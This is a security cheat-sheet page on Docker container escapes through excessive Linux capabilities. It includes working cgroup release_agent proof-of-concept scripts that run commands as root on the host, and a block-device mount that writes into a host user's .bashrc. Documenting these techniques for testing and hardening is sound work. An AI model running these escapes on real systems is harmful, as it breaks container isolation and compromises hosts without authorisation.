💻
Application Security Cheat Sheet
  • Application Security Cheat Sheet
  • Android Application
    • Overview
      • Application Data & Files
      • Application Package
      • Application Sandbox
      • Application Signing
      • Deployment
      • Package Manager
    • Intent Vulnerabilities
      • Deep Linking Vulnerabilities
    • WebView Vulnerabilities
      • WebResourceResponse Vulnerabilities
      • WebSettings Vulnerabilities
  • CI/CD
    • Dependency
      • Dependency Confusion
      • Dependency Hijaking
      • Typosquatting
    • GitHub
      • GitHub Actions
      • Code owners
      • Dependabot
      • Redirect
      • Releases
  • Cloud
    • AWS
      • Amazon API Gateway
      • Amazon Cognito
      • Amazon S3
  • Container
    • Overview
      • Container Basics
      • Docker Engine
    • Escaping
      • CVE List
      • Exposed Docker Socket
      • Excessive Capabilities
      • Host Networking Driver
      • PID Namespace Sharing
      • Sensitive Mounts
    • Container Analysis Tools
  • Framework
    • Spring
      • Overview
      • Mass Assignment
      • Routing Abuse
      • SpEL Injection
      • Spring Boot Actuators
      • Spring Data Redis Insecure Deserialization
      • Spring View Manipulation
    • React
      • Overview
      • Security Issues
  • Linux
    • Overview
      • Philosophy
      • File
      • File Descriptor
      • I/O Redirection
      • Process
      • Inter Process Communication
      • Shell
      • Signals
      • Socket
      • User Space vs Kernel Space
    • Bash Tips
  • iOS Application
    • Overview
      • Application Data & Files
      • Application Package
      • Application Sandbox
      • Application Signing
      • Deployment
    • Getting Started
      • IPA Patching
      • Source Code Patching
      • Testing with Objection
  • Resources
    • Lists
      • Payloads
      • Wordlists
    • Researching
      • Web Application
      • Write-ups
    • Software
      • AWS Tools
      • Azure Tools
      • Component Analysis
      • Docker Analysis
      • Dynamic Analysis
      • Fuzzing
      • GCP Tools
      • Reverse Engineering
      • Static Analysis
      • Vulnerability Scanning
    • Training
      • Secure Development
  • Web Application
    • Abusing HTTP hop-by-hop Request Headers
    • Broken Authentication
      • Two-Factor Authentication Vulnerabilities
    • Command Injection
      • Argument Injection
    • Content Security Policy
    • Cookie Security
      • Cookie Bomb
      • Cookie Jar Overflow
      • Cookie Tossing
    • CORS Misconfiguration
    • File Upload Vulnerabilities
    • GraphQL Vulnerabilities
    • HTML Injection
      • base
      • iframe
      • link
      • meta
      • target attribute
    • HTTP Header Security
    • HTTP Request Smuggling
    • Improper Rate Limits
    • JavaScript Prototype Pollution
    • JSON Web Token Vulnerabilities
    • OAuth 2.0 Vulnerabilities
      • OpenID Connect Vulnerabilities
    • Race Condition
    • Server Side Request Forgery
      • Post Exploitation
    • SVG Abuse
    • Weak Random Generation
    • Web Cache Poisoning
Powered by GitBook
On this page
  • CAP_SYS_ADMIN
  • Abusing usermode helper API
  • Abusing exposed host directories
  • CAP_SYS_MODULE
  • CAP_SYS_RAWIO
  • CAP_NET_ADMIN
  • CAP_SYS_CHROOT
  • CAP_SYS_PTRACE
  • CAP_NET_RAW
  • CAP_SYS_BOOT
  • CAP_SYSLOG
  • CAP_DAC_READ_SEARCH
  • References
  1. Container
  2. Escaping

Excessive Capabilities

PreviousExposed Docker SocketNextHost Networking Driver

Last updated 2 years ago

Running a Docker container with --privileged or dangerous capabilities allows privileged operations.

The --privileged flag gives all to the container, and it also lifts all the limitations enforced by the device cgroup controller. In other words, the container can then do almost everything that the host can do.

You can use the command to see granted capabilities:

$ capsh --print | grep Current

CAP_SYS_ADMIN

is largely a catchall capability, it can easily lead to additional capabilities or full root (typically access to all capabilities). CAP_SYS_ADMIN is required to perform a range of administrative operations, which is difficult to drop from containers if privileged operations are performed within the container. Retaining this capability is often necessary for containers which mimic entire systems versus individual application containers which can be more restrictive.

Abusing usermode helper API

Privileged containers can register usermode application helpers that are executed in the kernel context, for more information on invoking user-space applications from kernel see .

The escape technique is based on abusing the functionality of the notify_on_release feature in cgroups v1 to run the exploit as a fully privileged root user.

Here is a version of the PoC that launches ps on the host:

# Finds + enables a cgroup release_agent
d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`
# Enables notify_on_release in the cgroup
mkdir -p $d/w; echo 1 > $d/w/notify_on_release
# Finds path of OverlayFS mount for container
# Unless the configuration explicitly exposes the mount point of the host filesystem
# see https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html
t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
# Sets release_agent to /path/payload
touch /o; echo $t/c > $d/release_agent
# Creates a payload
echo "#!/bin/sh" > /c
echo "ps > $t/o" >> /c
chmod +x /c
# Triggers the cgroup via empty cgroup.procs
sh -c "echo 0 > $d/w/cgroup.procs"; sleep 1
# Reads the output
cat /o

Requirements to use this technique

In fact, --privileged provides far more permissions than needed to escape a Docker container via this method. In reality, the "only" requirements are:

  • You must be running as root inside the container.

  • The container must be run with the CAP_SYS_ADMIN Linux capability.

  • The container must lack an AppArmor profile, or otherwise allow the mount syscall.

  • The cgroup v1 virtual filesystem must be mounted read-write inside the container.

Using cgroups to deliver the exploit

The PoC abuses the functionality of the notify_on_release feature in cgroups v1 to run the exploit as a fully privileged root user.

When the last task in a cgroup leaves (by exiting or attaching to another cgroup), a command supplied in the release_agent file is executed. The intended use for this is to help prune abandoned cgroups. This command, when invoked, is run as a fully privileged root on the host.

If the notify_on_release flag is enabled in a cgroup, then whenever the last task in the cgroup leaves (exits or attaches to some other cgroup) and the last child cgroup of that cgroup is removed, then the kernel runs the command specified by the contents of the release_agent file in that hierarchy's root directory, supplying the pathname (relative to the mount point of the cgroup file system) of the abandoned cgroup. This enables automatic removal of abandoned cgroups. The default value of notify_on_release in the root cgroup at system boot is disabled. The default value of other cgroups at creation is the current value of their parents notify_on_release settings. The default value of a cgroup hierarchy's release_agent path is empty.

Escape only with CAP_SYS_ADMIN capability

There is a simpler way to write this exploit so it works without the --privileged flag. In this scenario, you won't have access to a read-write cgroup mount provided by --privileged. For this you will just mount the cgroup as read-write ourselves. This adds one extra line to the exploit but requires fewer privileges.

An example of a command to run the container on the host:

$ docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash

The exploit below will execute a ps aux command on the host and save its output to the /output file in the container. It uses the same release_agent feature as the original PoC to execute on the host.

# Mounts the RDMA cgroup controller and create a child cgroup
# This technique should work with the majority of cgroup controllers
# If you're following along and get "mount: /tmp/cgrp: special device cgroup does not exist"
# It's because your setup doesn't have the RDMA cgroup controller, try change rdma to memory to fix it
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
# Enables cgroup notifications on release of the "x" cgroup
echo 1 > /tmp/cgrp/x/notify_on_release
# Finds path of OverlayFS mount for container
# Unless the configuration explicitly exposes the mount point of the host filesystem
# see https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
# Sets release_agent to /path/payload
echo "$host_path/cmd" > /tmp/cgrp/release_agent
# Creates a payload
echo "#!/bin/sh" > /cmd
echo "ps aux > $host_path/output" >> /cmd
chmod a+x /cmd
# Executes the attack by spawning a process that immediately ends inside the "x" child cgroup
# By creating a /bin/sh process and writing its PID to the cgroup.procs file in "x" child cgroup directory
# The script on the host will execute after /bin/sh exits 
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
# Reads the output
cat /output

Abusing exposed host directories

Assusme, the /home directory is exposed by /dev/sdb1 within a privileged container. In such case, you can generate a device node for that block device, mount it into the container, and gain access to host's /home directory.

$ docker run --privileged -it --rm alpine:latest
/ $ apk update && apk add util-linux
# ...
/ $ lsblk
NAME      MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT
sda         8:0    0   45G  0 disk
├─sda1      8:1    0 40.9G  0 part /etc/hosts
├─sda2      8:2    0   16M  0 part
├─sda3      8:3    0    2G  0 part
│ └─vroot 253:0    0  1.2G  1 dm
├─sda4      8:4    0   16M  0 part
├─sda5      8:5    0    2G  0 part
├─sda6      8:6    0  512B  0 part
├─sda7      8:7    0  512B  0 part
├─sda8      8:8    0   16M  0 part
├─sda9      8:9    0  512B  0 part
├─sda10     8:10   0  512B  0 part
├─sda11     8:11   0    8M  0 part
└─sda12     8:12   0   32M  0 part
sdb         8:16   0    5G  0 disk
└─sdb1      8:17   0    5G  0 part
zram0     252:0    0  768M  0 disk [SWAP]
/ $ mknod /dev/sdb1 block 8 17
/ $ mkdir /mnt/host_home
/ $ mount /dev/sdb1 /mnt/host_home
/ $ echo 'echo "Hello from container land!" 2>&1' >> /mnt/host_home/eric_chiang_m/.bashrc

References:

CAP_SYS_MODULE

CAP_SYS_MODULE capability dropped by Docker in privileged containers.

References:

CAP_SYS_RAWIO

CAP_NET_ADMIN

It should be noted several privilege escalation vulnerabilities and other historical weaknesses have resulted from the ability to leverage this capability. This includes CVE-2011-1019 which effectively granted the CAP_SYS_MODULE capability to load arbitrary modules and was exploited trivially using ifconfig CVE-2010-4655 which resulted in a sensitive heap memory disclosure and CVE-2013-4514 resulting in Denial of Service and possibly arbitrary code execution. These issues are largely due to the significant attack surface and implicit module loading for special interfaces or socket types.

CAP_SYS_CHROOT

CAP_SYS_PTRACE

References:

CAP_NET_RAW

Docker setup container networking so that all containers share the same Linux virtual bridge. These containers will be able to communicate with each other. Even if this direct network access is disabled (using the -icc=false flag for Docker), containers are not restricted for link-layer traffic. In particular, it is possible (and in fact quite easy) to conduct an ARP spoofing attack on another container within the same host system, allowing full middle-person attacks of the targeted container's traffic.

CAP_SYS_BOOT

This capability also permits use of the kexec_load(2) system call, which loads a new crash kernel and as of Linux 3.17, the kexec_file_load(2) which also will load signed kernels.

CAP_SYSLOG

The kptr_restrict sysctl setting was introduced in 2.6.38, and determines if kernel addresses are exposed. This defaults to zero (exposing kernel addresses) since 2.6.39 within the vanilla kernel, although many distributions correctly set the value to 1 (hide from everyone accept uid 0) or 2 (always hide).

In addition, this capability also allows the process to view dmesg output, if the dmesg_restrict setting is 1. Finally, the CAP_SYS_ADMIN capability is still permitted to perform syslog operations itself for historical reasons.

CAP_DAC_READ_SEARCH

Docker has mitigated this issue by dropping CAP_DAC_READ_SEARCH (as well as blocking access to open_by_handle_at using seccomp)

References

allows the process to load and unload arbitrary kernel modules (init_module(2), finit_module(2) and delete_module(2) system calls). This could lead to trivial privilege escalation and ring-0 compromise. The kernel can be modified at will, subverting all system security, Linux Security Modules, and container systems.

provides a number of sensitive operations including access to /dev/mem, /dev/kmem or /proc/kcore, modify mmap_min_addr, access ioperm(2) and iopl(2) system calls, and various disk commands. The FIBMAP ioctl(2) is also enabled via this capability, which has caused issues in the . As per the man page, this also allows the holder to descriptively perform a range of device-specific operations on other devices.

allows the capability holder to modify the exposed network namespaces' firewall, routing tables, socket permissions, network interface configuration and other related settings on exposed network interfaces. This also provides the ability to enable promiscuous mode for the attached network interfaces and potentially sniff across namespaces.

permits the use of the chroot(2) system call. This may allow escaping of any chroot(2) environment, using known weaknesses and escapes:

allows to use ptrace(2) and recently introduced cross memory attach system calls such as process_vm_readv(2) and process_vm_writev(2). If this capability is granted and the ptrace(2) system call itself is not blocked by a seccomp filter, this will allow an attacker to bypass other seccomp restrictions, see .

allows a process to be able to create RAW and PACKET socket types for the available network namespaces. This allows arbitrary packet generation and transmission through the exposed network interfaces. In many cases this interface will be a virtual Ethernet device which may allow for a malicious or compromised container to spoof packets at various network layers. A malicious process or compromised container with this capability may inject into upstream bridge, exploit routing between containers, bypass network access controls, and otherwise tamper with host networking if a firewall is not in place to limit the packet types and contents. Finally, this capability allows the process to bind to any address within the available namespaces. This capability is often retained by privileged containers to allow ping to function by using RAW sockets to create ICMP requests from a container.

allows to use the reboot(2) syscall. It also allows for executing an arbitrary reboot command via LINUX_REBOOT_CMD_RESTART2, implemented for some specific hardware platforms.

was finally forked in Linux 2.6.37 from the CAP_SYS_ADMIN catchall, this capability allows the process to use the syslog(2) system call. This also allows the process to view kernel addresses exposed via /proc and other interfaces when /proc/sys/kernel/kptr_restrict is set to 1.

allows a process to bypass file read, and directory read and execute permissions. While this was designed to be used for searching or reading files, it also grants the process permission to invoke open_by_handle_at(2). Any process with the capability CAP_DAC_READ_SEARCH can use open_by_handle_at(2) to gain access to any file, even files outside their mount namespace. The handle passed into open_by_handle_at(2) is intended to be an opaque identifier retrieved using name_to_handle_at(2). However, this handle contains sensitive and tamperable information, such as inode numbers. This was first shown to be an issue in Docker containers by Sebastian Krahmer with exploit.

capabilities
capsh
CAP_SYS_ADMIN
here
@_fel1x
What does notify_on_release do?
Writeup: Privileged Containers Aren't Containers
CAP_SYS_MODULE
Writeup: How I Hacked Play-with-Docker and Remotely Ran Code on the Host
CAP_SYS_RAWIO
past
CAP_NET_ADMIN
CAP_SYS_CHROOT
How to break out from various chroot solutions
chw00t: chroot escape tool
CAP_SYS_PTRACE
PoC for bypassing seccomp if ptrace is allowed
tbhaxor: Container Breakout – Part 1 (LAB: Process Injection)
CAP_NET_RAW
CAP_SYS_BOOT
CAP_SYSLOG
CAP_DAC_READ_SEARCH
shocker
Understanding and Hardening Linux Containers
Abusing Privileged and Unprivileged Linux Containers
Understanding Docker container escapes